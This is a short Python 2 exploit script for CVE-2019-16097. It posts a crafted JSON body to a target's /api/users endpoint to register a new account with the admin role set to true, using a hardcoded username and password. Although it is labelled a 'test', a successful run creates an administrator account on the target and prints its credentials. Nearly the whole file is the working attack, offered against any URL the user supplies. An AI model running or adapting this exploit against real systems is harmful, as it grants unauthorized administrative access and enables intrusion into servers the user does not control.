CVE-2019-16097.py

#!/usr/bin/env python  
# _*_ coding: utf-8 _*_

import requests
import logging

__author__ = '白袍@Adan0s'
__date__ = '2019/9/19'

def test(url):
	bug_url = url + "/api/users"
	payload = '{"username":"eviladan0s","email":"eviladan0s@gmail.com","realname":"eviladan0s","password":"eviladan0s123QAQ","comment":"1","has_admin_role":true}'
	header = {"Content-Type": "application/json","Accept": "application/json"}
	try:
		r = requests.post(bug_url,data=payload,headers = header,timeout=10)
		print bug_url
		print r.status_code
		if r.status_code == 201:
			print "[!] This URL is Vulnerable !"
			print "[!] username: eviladan0s   password: eviladan0s123QAQ"
		else:
			print "[-] It's nothing."

	except Exception as e:
		logging.warning(bug_url)
		print e

if __name__ == '__main__':
	print "CVE-2019-16097-test"
	print "author: " + __author__
	print "date: " + __date__
	url = raw_input("[-] Please input URL(e.g. http://test.com:10000): ")
	test(url)